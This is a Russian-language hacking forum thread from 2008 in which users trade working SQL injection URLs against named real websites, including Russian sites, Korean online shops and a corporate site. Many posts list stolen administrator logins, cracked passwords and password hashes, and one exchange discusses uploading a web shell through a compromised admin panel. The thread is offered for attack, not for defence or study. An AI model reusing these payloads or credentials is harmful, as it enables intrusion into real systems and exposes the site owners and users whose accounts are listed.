12.06.2008, 19:35
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами:
9875274
Репутация:
91
|
|
Код:
http://www.warconent.com/artist.php?id=-12+union+select+1,phpQid,passwd,4,5,6,7,8,9,10,11,12,13,14+from+phpqadmin/*
Почемуто столбца с username небыло... |
|
|
12.06.2008, 20:38
|
|
Познающий
Регистрация: 27.05.2008
Сообщений: 51
С нами:
9450895
Репутация:
41
|
|
http://psyedu.ru/rview.php?view=-1+union+select+1,2,login,user_password,5,6,7+from+ user/*
maxwell 1q2w3e
http://psyedu.ru/admin 
Мона через создании статьи залить shell??? |
|
|
|
12.06.2008, 20:50
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Сообщение от tor4)
http://psyedu.ru/rview.php?view=-1+union+select+1,2,login,user_password,5,6,7+from+ user/*
maxwell 1q2w3e
http://psyedu.ru/admin
Мона через создании статьи залить shell??? Можно,если админка php или ещё какая,но не html =_=.
Мне чето чаще попадаются именно хтмл =_=.Попробуй через аплоад(хотя врядли получицо).А вообще в каждой админке,если она не самописная,есь свои дыры =_=,а то придёццо искать исходники =________________=
Последний раз редактировалось Велемир; 12.06.2008 в 20:53..
|
|
|
|
12.06.2008, 20:40
|
|
Участник форума
Регистрация: 08.02.2008
Сообщений: 116
С нами:
9607837
Репутация:
158
|
|
_http://www.bsigroup.ru/outgoing/news.php?id=0%27+union+select+1,2,3,4,5,6,7,8,conc at_ws(0x3a,_login_xz,_pass_xz),10+from+_system_use r/*
login  assword в MD5
salzman:gctdlj
svetlana:789258
два штуки удалось расшифровать
Последний раз редактировалось s_p_a_m; 12.06.2008 в 20:43..
|
|
|
|
12.06.2008, 21:33
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами:
9457097
Репутация:
133
|
|
просто обыныя страница
Код:
http://hayam.spinners.ru/view_thisf.php?i=-681%20union%20select%201,version(),3,4/*
VER:4.0.27-max-log
DB:zagorsk5
DBUSER:zagorsk5@v16.valuehost.ru |
|
|
|
12.06.2008, 22:26
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
Woonsanmall.com
http://woonsanmall.com/shop/board/view.php?id=wdietinfo&ws=1&s=4_4&no=17+union+selec t+1,2,3,4,5,6,7,concat_ws(0x3a,m_id,name,password) +from+gd_member/*
|
|
|
|
12.06.2008, 22:36
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
Интернет Магазины:
2002fifa.com
http://www.2002fifa.com/shop/board/view.php?id=movie&no=5'+union+select+1,2,3,4,5,6,7 ,8/*
и еще докручу потом)
https://shop.invictusnetworks.com/detail.php?id=16030'
http://rus.militaryantiqueshop.com/view.php?id=439'
http://mandbshop.com/shop/bbs/view.php?id=faq&page=1'
Последний раз редактировалось sabe; 13.06.2008 в 06:06..
|
|
|
|
12.06.2008, 22:36
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
Youleemall.com
http://youleemall.com/shop/board/view.php?id=franchise&no=3+union+select+1,2,3,4,ve rsion(),6,7,8/*
|
|
|
|
13.06.2008, 19:16
|
|
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
С нами:
10522103
Репутация:
272
|
|
Код:
http://www.vpole.ru/press/?id=-1467+union+select+1,aes_decrypt(AES_ENCRYPT(concat(0x3a,passwd),char(40)),char(40)),version(),4,5,6,7+from+users+limit+0,1/*
все поля, что смог добыть. хотя там еще fio вроде есть, но толку нету 
Код:
http://zaraev.ru/interv.php?table=thirdt&id=-1+union+select+1,2,3,concat_ws(0x3a,ID_GROUP,memberName,passwd,passwordSalt)+from+smf_members
ФОРУМ:
webmaster:9a4e3f3d060b2fe1d6006058608d899f5fd12df4 :9d2e
ak1nok:53aef746035f578fa4d9ce8ef7fe511d094e5174:6b 20
Код:
http://www.ortho-media.ru/index.php?p=2&n=-185+union+select+1,2,concat_ws(0x3a,username,user_password),4,5,6,7,8,9,0,11+from+phpbb_users+where+user_level=1+limit+0,1
Админы форума:
admin:2aea4662595bb1c87f4217ac802447d5
Сергей Чапнин:e27a05392d79b6e32d26c3829eeca755: potsdam
Роман Наумов:0a0b3fef760c72c912f922e3f6f2d173
Код:
http://www.buddhism.ru/info/tour.php?id=1829999+union+select+table_name+from+information_schema.columns+where+column_name+like+char(37,112,97,115,37)+limit+0,1
|
|
|
|
13.06.2008, 20:04
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами:
9456679
Репутация:
97
|
|
http://www.pernod-ricard-usa.com/media/pr.php?id=-26'+union+select+concat_ws(0x3A3a,user,password)+f rom+mysql.user/*&pr_id=167
В обратном порядке:
prusa::798aedc01f3da90f
horde::5a53dc5b3d8c9efd
pma_0KbygRTartGC::52946058691b483a
admin::1e634b394cd6be54
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
